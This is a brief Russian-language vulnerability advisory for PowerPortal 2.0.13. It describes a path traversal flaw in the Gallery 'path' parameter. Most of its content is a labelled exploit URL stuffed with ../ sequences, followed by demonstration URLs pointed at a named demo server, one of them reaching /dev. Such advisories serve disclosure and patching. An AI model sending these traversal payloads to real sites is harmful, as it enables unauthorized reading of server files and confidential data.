Программа: PowerPortal 2.0.13
Уязвимость позволяет удаленному злоумышленнику получить несанкционированный
доступ к конфиденциальной информации на целевой системе. Уязвимость существует
из-за ошибки в проверке входных данных в параметре «path». Атакующий может
получить несанкционированный доступ к конфиденциальной информации на целевой
системе.
Эксплоит:
http://site.com/index/Gallery/?path=../../../../../../../
Демонстрация:
http://demo.powerportal2.com/index/Gallery/?path=../../../../../../../
http://demo.powerportal2.com/index/Gallery/?path=../../../../../../../dev
